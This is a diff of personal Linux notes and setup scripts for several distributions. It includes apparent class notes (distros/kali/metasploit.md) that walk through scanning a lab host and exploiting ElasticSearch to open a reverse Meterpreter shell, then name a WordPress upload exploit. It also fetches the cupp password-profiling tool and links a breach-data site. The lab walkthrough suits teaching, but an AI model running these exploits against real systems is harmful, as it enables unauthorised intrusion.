> echo crypt > /etc/hostname
> # make sure keyboard encrypt lvm2 are on the list of HOOKS
> vi /etc/mkinitcpio.conf
> grub-install /dev/sda
> vi /etc/default/grub
edit the GRUB_CMDLINE_LINUX=""
`GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:usb root=/dev/mapper/usb-root"`
> grub-mkconfig -o /boot/grub/grub.cfg
> mkinitcpio -p linux
> pacman -S wpa_supplicant dialog

15
distros/arch/fonts.md Normal file
View File

@ -0,0 +1,15 @@
# Basics
Update font-cache:
> fc-cache
List fonts:
> fc-list
Grab the part of the font name you need for Xresources:
> fc-list | cut -d: -f2
Add field 3 for styles.

94
distros/arch/lxc.md Normal file
View File

@ -0,0 +1,94 @@
This is an untested mess.
# Required
> sudo pacman -S lxc arch-install-scripts dnsmasq
Place the following in /etc/default/lxc-net to configure the network:
---
# Leave USE_LXC_BRIDGE as "true" if you want to use lx
cbr0 for your
# containers. Set to "false" if you'll use virbr0 or
another existing
# bridge, or mavlan to your host's NIC.
USE_LXC_BRIDGE="true"
# If you change the LXC_BRIDGE to something other than
lxcbr0, then
# you will also need to update your /etc/lxc/default.c
onf as well as the
# configuration (/var/lib/lxc/<container>/config) for
any containers
# already created using the default config to reflect
the new bridge
# name.
# If you have the dnsmasq daemon installed, you'll als
o have to update
# /etc/dnsmasq.d/lxc and restart the system wide dnsma
sq daemon.
LXC_BRIDGE="lxcbr0"
LXC_ADDR="10.0.3.1"
LXC_NETMASK="255.255.255.0"
LXC_NETWORK="10.0.3.0/24"
LXC_DHCP_RANGE="10.0.3.2,10.0.3.254"
LXC_DHCP_MAX="253"
# Uncomment the next line if you'd like to use a conf-
file for the lxcbr0
# dnsmasq. For instance, you can use 'dhcp-host=mail1
,10.0.3.100' to have
# container 'mail1' always get ip address 10.0.3.100.
#LXC_DHCP_CONFILE=/etc/lxc/dnsmasq.conf
# Uncomment the next line if you want lxcbr0's dnsmasq
to resolve the .lxc
# domain. You can then add "server=/lxc/10.0.3.1' (or
your actual $LXC_ADDR)
# to your system dnsmasq configuration file (normally
/etc/dnsmasq.conf,
# or /etc/NetworkManager/dnsmasq.d/lxc.conf on systems
that use NetworkManager).
# Once these changes are made, restart the lxc-net and
network-manager services.
# 'container1.lxc' will then resolve on your host.
#LXC_DOMAIN="lxc"
---
Then start the lxc NAT:
> sudo systemctl start lxc-net
> sudo systemctl restart NetworkManager
... and make sure the bridge's ip-range doesn't intefere withe local network.
> sudo arp-scan -I lxcbr0 -l
The lxc template is in /etc/lxc/default.conf. You need to modify it so that it uses lxcbr0.
---
/etc/lxc/default.conf
lxc.net.0.type = veth
lxc.net.0.link = lxcbr0
lxc.net.0.flags = up
lxc.net.0.hwaddr = 00:16:3e:xx:xx:xx
---
# Making machines
> sudo lxc-create -n roach -t download -- --dist archlinux --release current --arch amd64
Arch linux containers take up about 600 Megs.
To speed up the startup process, one can install haveged and start the haveged.service. Haveged stops the wait-time for system entropy creation.
Machines are stored in /var/lib/lxc.
# Starting
> lxc-attach -n roach

31
distros/arch/pacman.md Normal file
View File

@ -0,0 +1,31 @@
Packages are kept in /var/cache/pacman/pkg.
Delete unused old packages with:
> sudo pacman -Sc
Signatures are handled by the pacman-key, initially set up with:
> sudo pacman-key --populate archlinux
And refreshed with:
sudo pacman-key --refresh-keys
If you have usigned keys, you can refresh with:
> sudo pacman -Sc
or
> sudo pacman -Scc
Reset all keys with:
> sudo rm -r /etc/pacmand.d/gnupg/ && sudo pacman-key --init
If you're constantly getting 'everything corrupted, nothing upgraded', try running:
> sudo pacman -S archlinux-keyring

BIN
distros/arch/perl.zip Normal file

Binary file not shown.

View File

@ -0,0 +1,37 @@
> yay -S pi-hole-server pi-hole-ftl
> sudo systemctl disable systemd-resolved
> sudo systemctl stop systemd-resolved
> sudo systemctl enable pi-hole-server pihole-FTL
> sudo systemctl start pi-hole-server pihole-FTL
Remove that google dns server.
> pihole -a setdns 1.1.1.1 1.0.0.1
Disable pihole password by setting a blank password.
> pihole -a -p
# Configure cloudflare DNS
> yay -S cloudflared-bin
echo "proxy-dns: true
proxy-dns-upstream:
- https://1.0.0.1/dns-query
- https://1.1.1.1/dns-query
- https://2606:4700:4700::1111/dns-query
- https://2606:4700:4700::1001/dns-query
proxy-dns-port: 5053
proxy-dns-address: 0.0.0.0" > /etc/cloudflared/cloudflared.yml
echo "
PRIVACYLEVEL=0
IGNORE_LOCALHOST=no
AAAA_QUERY_ANALYSIS=yes

5
distros/arch/problems.md Normal file
View File

@ -0,0 +1,5 @@
Broken Xorg
> sudo X -configure

View File

@ -0,0 +1,47 @@
#!/bin/bash
# https://www.unixmen.com/install-arch-linux-raspberry-pi/
pacman-key --init || echo init fail >> log
pacman-key --populate archlinuxarm || echo update fail >> log
pacman -Syyuu || echo update fail >> log
sed -i s/#en_GB.UTF-8 UTF-8/en_GB.UTF-8 UTF-8/ /etc/locale.gen
echo 'LANG=en_GB.UTF-8' >> /etc/locale.conf
locale-gen
pacman -S base-devel htop ranger tmux lolcat fortune-mod texlive-most darkhttpd git figlet rxvt-unicode task timew calcurse fail2ban
if [[ $2 == all || $1 == all ]]; then
pacman -S nnn feh dmenu rofi xf86-video-fbdev xorg xorg-xinit xorg-server xorg-server-utils xterm
fi
# Audio
echo 'dtparam=audio=on' >> /boot/config.txt
if [[ $1 == audio ]]; then
pacman -S alsa-utils alsa-firmware alsa-lib alsa-plugins
fi
echo 'device_tree_param=spi=on' >> /boot/config.txt
# for a vnc viewer
if [[ $1 == vnc ]]; then
tigervnc gcc geany i3 i3status compton feh sxiv rxvt-unicode
fi
# Swap
cd /var/cache/swap
sudo dd if=/dev/zero of=swapfile bs=1K count=2M
sudo chmod 600 swapfile
sudo mkswap swapfile
sudo swapon swapfile
echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab

View File

@ -0,0 +1,8 @@
#!/bin/bash
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam

View File

@ -0,0 +1,16 @@
#!/bin/bash
# This has been changed since testing.
yay -S pi-hole-ftl pi-hole-server
# Configuration in /etc/pihole/pihole-FTL.db
# You can change DBINTERVAL to 60 or more to limit writes to disk
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo systemctl start pihole-FTL
pihole -g || echo '' ; echo 'Your pihole is gubbed' ; exit 1
pihole -c

View File

@ -0,0 +1,8 @@
#!/bin/bash
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam

View File

@ -0,0 +1,10 @@
git clone https://aur.archlinux.org/yay.git
cd yay
makepkg -si
yay -S perl-graph-easy signal-desktop sc-im ncpamixer xdg-utils-mimeo
yay -S ttf-tengwar-annatar

10
distros/arch/steam.sh Normal file
View File

@ -0,0 +1,10 @@
#!/bin/bash
sudo pacman -S flatpak
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam

22
distros/debian/apt.md Normal file
View File

@ -0,0 +1,22 @@
# Problems
## apt
### Configurations?
Fucked up a package's configuration files?
> sudo apt-get purge [thing]
> sudo apt autoremove
Check if you still have related things:
> apt search [thing]
> sudo apt-get install [ thing ]
Still have problems?
> sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing]

View File

@ -0,0 +1,5 @@
# Videos not working
> sudo apt-get install lubuntu-restricted-extras

View File

@ -0,0 +1,87 @@
cd /usr/share/X11/xkb/symbols/
cp pc pc.bak
echo "pc backup copied - this isn't tested" >> ~/install.log
sed s/Caps_Lock/Escape/ pc > pc
cd
echo "deb https://dl.bintray.com/hawkeye116477/waterfox-deb release main" | sudo tee -a /etc/apt/sources.list
curl https://bintray.com/user/downloadSubjectPublicKey?username=hawkeye116477 | sudo apt-key add -
sudo apt-get update && sudo apt-get install waterfox
echo "deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/sources.list
setxkbmap gb
# gksudo firefox -install-global-extension addon-1865-latest.xpi
#install addon with cli
apt-get -y install openvpn
cd /etc/openvpn
sudo wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
unzip ovpn.zip
rm ovpn.zip
sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome
wget https://github.com/maestrogerardo/i3-gaps-deb/archive/master.zip
echo "if you don't have openvpn options in your gnome desktop, this just isn't going to work. Get the openvpn manager, called 'openvpn-service-gnome' or some such" >> ~/*log
unzip ma*
rm ma*zip
cd i3-g*
sudo apt -y update;sudo apt -y upgrade
./i3*
cd
mv i3/ .config
sudo apt install feh compton ranger w3m cmus scrot
sudo apt install tor
wget https://github.com/dpayne/cli-visualizer/archive/master.zip
echo "If vis is playing funny-buggers, enter the install files and input the commands manually. May be an architecture problem as I don't have arm cpu" >> *log
unzip master.zip
rm master.zip
cd cli-vis*
apt install libfftw3-dev libncursesw5-dev libpulse-dev
./install.sh
cd
mkdir Images;mkdir Images/Wallpapers;mkdir Images/Screenshots
apt install -y encfs cmatrix cowsay
mkdir Tools
cd Tools
wget https://github.com/Mebus/cupp/archive/master.zip
unzip master.zip;rm master.zip
cd

124
distros/kali/metasploit.md Normal file
View File

@ -0,0 +1,124 @@
> service postgresql start
> systemctl status postgresql
> msfdb init
start the metasploit
> msfconfole
show exploits
Examples:
> info exploit/something
> search cve:2019
## Basic theory
There are vulnerabilities and payloads.
Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells.
You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you.
# Notes for Class
Victim: 172.18.3.26
> nmap -Pn -sV 172.18.3.26 --script=vuln
> nmap -Pn -sV 172.18.3.26
Output:
```
Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
Nmap scan report for 172.18.3.26
Host is up (0.016s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
4848/tcp open appserv-http?
8022/tcp open oa-system?
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8383/tcp open ssl/m2mservices?
9200/tcp open tcpwrapped
49153/tcp open unknown
49154/tcp open unknown
49159/tcp open unknown
49161/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
Note this one:
`9200/tcp open tcpwrapped`
Apparently that's 'elasticsearch', so in metasploit we can do:
`search elasticsearch`
```
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility
1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal
2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution
3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass
4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
```
If you want to use 2, `use 2` or `use/multi/ela` then tab out.
> show options
> set rhost 172.18.3.26
The remote port's already set at this point.
We've so far done use, rhost, and port.
> exploit
```
[*] Started reverse TCP handler on 172.18.3.112:4444
[*] Trying to execute arbitrary Java...
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[*] Sending stage (53845 bytes) to 172.18.3.26
[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
```
> dir
# Next Wordpress
http://172.18.3.26:8585/wordpress/
Back to normal shell.
> search wordpress ninja
> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

View File

@ -0,0 +1,8 @@
https://coldwallet.io/
https://www.it-vn.com/2019/07/configure-ssh-to-avoid-from-shodan-and.html
https://wickr.com
https://weleakinfo.com/

View File

@ -0,0 +1,11 @@
> cd /etc/yum.repos.d/
> vim public.yum*
These are branches of the same Oracle server.
The first - 'latest' - is enabled by default.
You can change 'enabled' from 0 to 1 for various repositories.

11
distros/redhat/npm.md Normal file
View File

@ -0,0 +1,11 @@
package.json is the basic configuration file.
Everything is per-directory.
> npm install x
This'll install x in the current directory.
> npm init
> npm install express --save

22
distros/redhat/yum.md Normal file
View File

@ -0,0 +1,22 @@
# Overview
Forks include CentOS, scientific Linux, Oracle, and Fedora.
Major features: reliable, shit package selection.
# Basically yum
> yum search [package]
> yum list openssh
> yum install [package1] [package2]
> yum check-updates
> yum update
yum remove [package1] [package2]

View File

@ -0,0 +1,8 @@
Nothing interesting.
1. Install
2. Set a dns resolver in /etc/resolv.conf (`nameserver 1.1.1.1` works)
3. Enable NetworkManager
3. zypper install http-something php5 apache2
4. vi /srv/www/htdocs/index.html
5. Enable apache2

43
distros/void/autologin Normal file
View File

@ -0,0 +1,43 @@
# Automatic Login On TTY1
Create a new autologin service:
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
Note: The name of the custom service file must end with -tty1 (or another valid port). Otherwise the run-script will not work.
> vim /etc/sv/agetty-autologin-tty1/conf:
```
GETTY_ARGS="--autologin yourusernamehere --noclear"
BAUD_RATE=38400
TERM_NAME=linux
```
If you are logged in on tty1 right now, logout, switch to tty2 (with CTRL+ALT+F2) and re-login there.
Disable the regular tty1 service and enable autologin:
> rm /var/service/agetty-tty1
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
Now switch to tty1 and you should already be logged in there automatically.
Autostart Graphical Environment on Login
Add the following to your shell's profile file to start X and lock the tty session:
# Autologin on tty1
In `bashrc`.
```
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
exec startx
fi
```

21
distros/void/autologin.md Normal file
View File

@ -0,0 +1,21 @@
Make the autologin service:
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
> echo "GETTY_ARGS="--autologin yourusernamehere --noclear"
> BAUD_RATE=38400
> TERM_NAME=linux" > /etc/sv/agetty-autologin-tty1/conf
> rm /var/service/agetty-tty1
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
Then stick this at the end of the bashrc:
```
# autologin on tty1
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
exec startx
fi
```

20
distros/void/basics.md Normal file
View File

@ -0,0 +1,20 @@
# vkpurge
Old Void kernels are left on the boot partition. List them with:
> vkpurge list
Remove one with:
> vkpurge 2.8.2_4
Remove all but the latest with:
> vkpurge rm all
# Brightness
/sys/class/backlight/*/brightness

12
distros/void/extrace.md Normal file
View File

@ -0,0 +1,12 @@
Monitor all processes:
> extrace
Monitor one process:
> extrace ls
Monitor a script:
> ./script.sh | extrace

20
distros/void/kernels.md Normal file
View File

@ -0,0 +1,20 @@
# vkpurge
Old Void kernels are left on the boot partition. List them with:
> vkpurge list
Remove one with:
> vkpurge 2.8.2_4
Remove all but the latest with:
> vkpurge rm all
# Troubleshooting
Filled up your /boot? Try reconfiguring and installing the latest:
> xbps-reconfigure -f linux5.2

6
distros/void/keyboard Normal file
View File

@ -0,0 +1,6 @@
To list keyboard specs:
> locale

64
distros/void/lxc Normal file
View File

@ -0,0 +1,64 @@
#Intro
Taken from [this](https://r4nd0m6uy.ch/unpriviledged-containers-in-void-linux.html)
Void linux requires additional steps to set up, as Systemd is no present to automatically take care of everything.
> sudo xbps-install cgmanager dbus bridge-utils lxc
Next, startup services:
> sudo ln -s /etc/sv/dbus/ /var/service/
> sudo ln -s /etc/sv/cgmanager/ /var/service/
> sudo sv start dbus
> sudo sv start cgmanager
> sudo sv start dbus
> sudo sv start cgmanager
Maps your user account to the lxc g/u ids:
> sudo usermod --add-subuids 100000-165536 $USER
> sudo usermod --add-subgids 100000-165536 $USER
Then add a bridge interface to connect the container.
> sudo brctl addbr lxbr0
Then add an interface. I have no idea how this is done or what it means, so I tried my wifi 'wlp3s0', and that was refused. I tried the guide's one, which obviously didn't work as I didn't have the same interface as in the guide. Finally, I tried `ip addr show` and noticed other devices 'lo' and 'wwp0s20u4i6'. This gave me:
> sudo brctl addif lxbr0 wwp0s20u4i6
... which worked.
If you don't want to redo this each boot, you can make a runit service for it apparently - more research is required for this. For now, I'm just copy-pasting the guide (almost) and sticking this in ~/.config/lxc/default.conf:
`lxc.network.type = veth`
`lxc.network.link = wwp0s20u4i6`
`lxc.network.flags = up`
`lxc.network.hwaddr = 00:16:3e:BB:CC:DD`
`lxc.id_map = u 0 100000 65536`
`lxc.id_map = g 0 100000 65536`
You can now configure a different bridge each boot to connect with the lxc containers, or ....
Next, do this at *every boot* (or script it):
> sudo cgm create all $USER
> sudo cgm chown all $USER $(id -u) $(id -g)
> cgm movepid all $USER $$

View File

@ -0,0 +1,34 @@
# Bridged adapters
Virtual machines can use a bridge to connect to the internet. Access the manual with
> man brctl
You can add a new bridge with:
> brctl addbr <name>
... and delete a bridge by pulling it down, then
> brctl delbr <name>
# wpa_supplicant
> scan
> scan_results
> add_network
> set_network 0 ssid "MYSSID"
> set_network 0 psk "passphrase"
OR > set_network 0 key_mgmt NONE
> enable_network 0
> save_config
might want to 'sudo sv restart dhcpcd'

View File

@ -0,0 +1,20 @@
#!/bin/sh
ln -s /etc/sv/ntpd /var/service
sv start ntpd
sleep 3
ntpd -q
echo 'dtparam=audio=on' >> /boot/config.txt
xbps-install -Syuv
xbps-install -Sy xorg-minimal xf86-video-fbturbo
useradd -m -G wheel,audio,video ghost
xbps-install sc-im vim cowsay lolcat-c ranger lf bash

12
distros/void/sv Normal file
View File

@ -0,0 +1,12 @@
# Basics
Services display in /var/service
sv up ssh
sv down ssh
sv restart ssh
# Making a Service
Look in the `/etc/sv` directory, then in the existing services' run files.
You'll find a simple dash script (therefore Posix compliant).

115
distros/void/xbps.md Normal file
View File

@ -0,0 +1,115 @@
Install cowsay
> xbps-install cowsay
Look for cowsay
> xbps-query -Rs cowsay
Upgrade current packages. -R looks at repositories, -s makes things sloppy.
> xbps-install -Suv
Remove cowsay
> xbps-remove cowsay
...and all dependencies
> xbps-remove -R cowsay
Reinstall cowsay
> xbps-install -f
Reconfigure all packages. Useful for breakages.
> xbps-pkgdb -a
Remove all dependencies.
> xbps-remove -o
Show information about cowsay
> xbps-query -RS cowsay
Search for cows
> xbps-query -Rs cows
List packages requiring updates.
> xbps-install -Suvn
List what's required for cowsay
> xbps-query -x cowsay
List what's installed.
> xbps-query -l
Clean.
> xbps-remove -O
apt update
> xbps-install -S
Remove package information.
> xbps-query -R
Display all cowsay files
> xbps-query -Rf cowsay
Do I have cowsay installed?
> xbps-query -s cowsay
What packages are pointless?
> xbps-query -O
> xbps-install -Sn cowsay
A dry-run of installing cowsay, without actually intalling.
# Advanced
> xbps-query -x cowsay
Show cowsay's dependencies. The -R flag's required for a remote package.
> xbps-query -X cowsay
Show the reverse dependencies of a package.
> xbps-query -XR cowsay
Show all reverse dependencies of a package, including repository packages.
> xbps-query -m
List all manually installed software.
# Problems
Look for broken packages.
> sudo xbps-pkgdb -a
And if you've found any, you might try:
> sudo xbps-reconfigure -af
This reconfigures all packages forcefully.
If that doesn't help the issue, try to find the broken package and forcefully reinstall:
> xbps-query -s gnutls
> sudo xbps-install -f gnutls

58
fundamentals/archives.md Normal file
View File

@ -0,0 +1,58 @@
# Automatic Backups with `find`
> find /home/"$(whoami)" -type f -size -2M | xargs zip -u backup
# Tar Archives
Create ze files:
> tar czf file.tar.gz file1 file2
Extract ze files:
> tar xzf file.tar.gz
The .tar extension means two or more files are bundled together into a single file. The .tar.gz means compression.
Tarballs come with a number of arguments.
- c means 'create'.
- v means 'verbose'.
- f means 'this is the file' and must always be the ultimate argument.
- z means compression.
So we can compress file1 and file2 into a single tar called 'archive' with:
> tar czvf archive.tar.gz file1 file2
Extraction uses 'x' instead of 'c'.
> tar xzvf archive.tar.gz
Create a very compressed file:
> tar cfj super-compressed.tar.gz file1 file2
# Example - Compressing all Latex Files in /home/
> sudo find ~ -maxdepth 4 -name "*.txt" | xargs tar cvf latex-bundle.tar.gz
# ssh backup
Back up an unmounted partition with ssh:
> sudo dd if=/dev/sda1 | ssh -C ghost@192.168.0.10 "dd of=/home/ghost/backup.img" status=progress
# img.xz
Unzip the image with:
> unxz void.img.xz
This then deletes the .xz file. To keep it:
> unxz --keep void.img.xz

34
fundamentals/at.md Normal file
View File

@ -0,0 +1,34 @@
`at` must be installed with:
> sudo apt-get install at
Then jobs can be specified with absolute time, such as:
> at 16:20
> at noon
> at midnight
> at teatime
The jobs can also be specified relative to the current time:
> at now +15 minutes
Finally, accept the jobs with ^D.
# Managing `at` Jobs
Display a list of commands to run with:
> atq
`2 Sat Oct 20 16:00:00 2018 a roach-1`
This will print all pending IDs. Remove a job by the ID with:
> atrm 2
Check /var/spool/cron/

154
fundamentals/bash.md Normal file
View File

@ -0,0 +1,154 @@
# STIN, STOUT, STERR
Input is 0, output is 1, error is 2.
Pipe standard output to log.txt while also outputting it.
> cat file.txt |& tee -a log.txt
Copy file and *if* that's successful, delete it where it stands.
> scp archive.tar.gz pi@192.168.0.31:/home/pi && rm archive.tar.gz
A double pipe will try one, and do the other if that fails.
> cp -r ~/Archive ~/Backup || tar czf Archive.tar.gz *
# REGEX
Regular expression characters include:
\\ ^ $ . | ? * + () [] {}
As a result, grep cannot read these characters as literal characters unless they are escaped. E.g.
> grep wtf\? log.txt
... will search the string 'wtf?' in the file log.txt. Another version is egrep (now used with 'grep -e') which uses more characters as special characters, or fgrep, which treats all characters as literal strings.
# Environmental Variables
PWD, USER, PATH
To display all environmental (but not local) variables, use
> env
Set a variable with
> colour=red
Display your variable with
> echo $colour
Export this to the entire system using:
> export colour=blue
# Search commands
> apropos cat
# Working with Text
Convert every tab to ten spaces.
> expand -t 10 file.txt
Or the reverse, with 3 spaces converting to a tab.
> unexpand -t 3 file.txt
Format a file by cutting text after 60 characters.
> fmt -w 60 file.txt
Indent all but the first line of a paragraph.
> fmt -t file.txt
Look at the new lines of a file only:
> tail -f /var/log/syslog
The sort function arranges lines alphabetically. Use -r to reverse and -n to sort by number.
# Sed
> sed -i s/hey/hoi/g greetings.txt
Edit all examples of hey to hoi in greetings and print that to the file.
# Measurement
Measure how long a script takes for super-autism powers.
> time [bash script]
# Functions
> function my_funct(){ do_thing $1; }
Remove a function with
> unset my_function
# Paths
Every shell has various paths from where it can execute binary files. Find out your current one with:
> echo $PATH
To add a directory to a path, e.g. /usr/share/bin, you can declare it in addition to the old path with:
> PATH=$PATH:/usr/share/bin
And then check it by echoing the path again.
Before this, probably best to check the path exists with:
> if [ -e /usr/share/bin ]; then
> echo yes
> fi
# Pipes, Pedantry and Brackets
Things that [[ ]] statements can do which [ ] statements cannot:
- Intuitive and easy 'and' statements.
- [[ -z $var && -d ~/LK ]]
- Intuitive and easy 'or' statements.
- [[ -d LK || -f ghost-backup.zip ]]
- Simple expression comparisons
- [[ $v1 > $v2 ]]
- Simple expression comparisons with clumsy strings
- [[ item-1 > item-2 ]]
- Vague comparisons
- [[ $answer =~ ^y(es)?$ ]]
# exec
exec will start a process running as just that process. In a bash script, the line:
> unison rat
... will startup `unison` as a sub-process of bash. But:
> exec unison rat
... starts unison as its own process.
# Brace expansion
> mv picture{,-1}.jpg
This expands to
> mv picture.jpg picture-1.jpg
# `for` Statements
for f in *tiff;do
convert "$f" "${f/.tiff/.png}"
done

93
fundamentals/basics.md Normal file
View File

@ -0,0 +1,93 @@
# Processes
Process id 1 is systemd. All other processes are child processes.
> ps -sH
This has every process on the system, and -H shows the hierarchy. This can be piped to less to view easily.
> ps -u ghost
Looking at processes spawned from user 'ghost'.
> ps -e --forest
Like tree, but more.
> ps -sfH
The fucking lot.
All of this is from /proc, which is a direct line to the kernel. Commands like `free', `top' et c. pulls from /proc.
# Top
In `top' we can take the pid and then press `k' in order to kill that process.
# check what's going on with qutebrowser
> ps aux | grep qutebrowser
# Check open ports
sudo netstat -tulpn
#Check that udev process
systemctl status udev
# Show net interface
> ip addr show
This can also take arguments, such as the name of an interface.
# Find
> find . -name 'bob cv'
Find file 'bob cv'
> find . -size +7G
Find files of 7Gig or more.
> find -name *hidden* -type l
Find a symbolic link containing 'hidden' in the name.
> find -name *txt -delete
Delete all files from here of the *txt type.
> find -type d -empty
Find empty directories.
> find . mtime 50
Find all file modified precisely 50 days ago. There's also:
* -mtime +20
* file modified more than 20 days ago.
* -atime -13
* file *accessed* less than 13 days ago.
* -cmin 20
* file *modified* 20 minutes ago.
* -mmin +70
* files modified more than 70 minutes ago.
# Logs
> cat /var/logs/auth.log | grep fail
# Files
> file example.txt
This shows info about a file.
# Further reading
[Hund](https://hund0b1.gitlab.io/2019/02/11/a-collection-of-handy-ways-of-manipulating-text-in-bash.html) has some fantastic examples.

98
fundamentals/boot.md Normal file
View File

@ -0,0 +1,98 @@
# Basic Startup
BIOS > MBR > GRUB > Kernel > Init > Run Level
- The BIOS identifies system hardware.
- The Master Boot Record contains partition and filesystem data.
- The Grand Unified Bootloader executes the kernel.
- The Init Executes designates run level (via SysVinit, Upstart, or Systemd).
- Run Level starts the user's session.
The Master Boot Record is a 512 byte file called boot.img which starts the first sectore of core.img into memory (GRUB Stage 1.5), which then executes /boot/grub.
# Access system
Ctrl+c at boot then add in
> rw init=bash
# Run Levels
0: Half
1: Single user mode
2: Multi-user, without NFS
3: Full multi-user mode
4: Unused
5: X11
6: Reboot
None of this is used by humans anymore - it's all systemd.
# Systemd
See what's running with ....
> systemctl list-units
Stop, start, whatever with:
systemctl enable|stop|start httpd
This starts httpd (Fedora's word for Apache2).
# Boot Records
'File System Tab' under /etc/fstab keeps track of the partitions and boot order.
The logical voluem manager (LVM) can make non-hardware partitions.
The nomenclature is:
- PV = physical volume
- LV = logical volume
- VG = volume group
# Volume Groups
> sudo vgcreate work-volume /dev/sdb2 /dev/sdb4
This creates the volume group 'work-volume', consisting in sdb2 and sdb4.
Now you ahve a volume group, you can use it as part of a new logical volume.
> sudo lvcreate -n noob-lv work-volume
Then scan for all logical volumes on the system with lvscan.
> sudo lvscan
# GRUB
Install a grub with either:
> sudo grub-install /dev/sda
or
> sudo grub2-install /dev/sda
This takes all settings from /etc/fstab.
Then when done editing settings update the script in /boot/grub/grub.cfg (in Debian) or /boot/boot/grub/menu (in other systems).
There are default examples in /etc/grub.d/ (but not on Ubuntu).
Finalize your settings with grub-mkconfig (or grub2-mkconfig), or update-grub.
# Cowardice
If you can't do that, use boot-repair:
> help.ubuntu.com/community/Boot-Repair

View File

@ -0,0 +1,18 @@
Convert a text file from one encoding type to another with:
> iconv -f ascii -t utf8 oldfilename > newfilename
Available options are:
* ISO-8859-15
* UTF-8
* ASCII
* Lots more
Generate a full list of encoding types available with:
> iconv -l

34
fundamentals/clock.md Normal file
View File

@ -0,0 +1,34 @@
# Basics
Show system time:
> date
Show hardware time:
> sudo hwclock -r
Change system time to match hardware time:
> sudo hwclock --hctosys
Change hardware time to match system time:
> sudo hwclock --systohc
Manually set the hardware time to a specified date:
> sudo hwclock --set --date="8/25/19 13:30:00"
# Network Time Providers
Servers which take their time from an observatory we call Stratum 1 servers. Servers which takes their time from Stratum n servers are Stratum n+1 servers.
Install ntp with:
> sudo apt-get install -y ntp
The shell command for this is `ntpq`. Monitor the service providers using:
> ntpq -p

View File

@ -0,0 +1,84 @@
# If statements
Test statement equality as so:
```
read t1
read t2
if test $t1 != $t2; then
echo 'variables do not match'
else
echo 'variables match'
fi
exit 0
```
# Case Structure
These deal with multiple states rather than forking conditions.
Example:
```
#!/bin/bash
# Simple case demonstration
echo "What's your favourite creature?"
read CRE
case $CRE in
human | humanoids ) echo "Why is $CRE always standard?"
;;
troll | monsters ) echo "Not exactly known for their character ..."
;;
owlbears | monsters ) echo "Really you're a wizard fan"
;;
esac
# While and Until
This prints from 10 until 2.
> declare -i COUNTER
> COUNTER=10
> while [ $COUNTER -gt 2 ]; do
> echo The counter is $COUNTER
> COUNTER=COUNTER-1
> done
> exit 0
```
There's also 'until', which stops when something is true, rather than keeping going when something is true.
# For
> for i in $( ls ); do
> du -sh $i
> done
# Sequences
The sequences tool counts up from X in jumps of Y to number Z.
Count from 1 to 10.
> seq 10
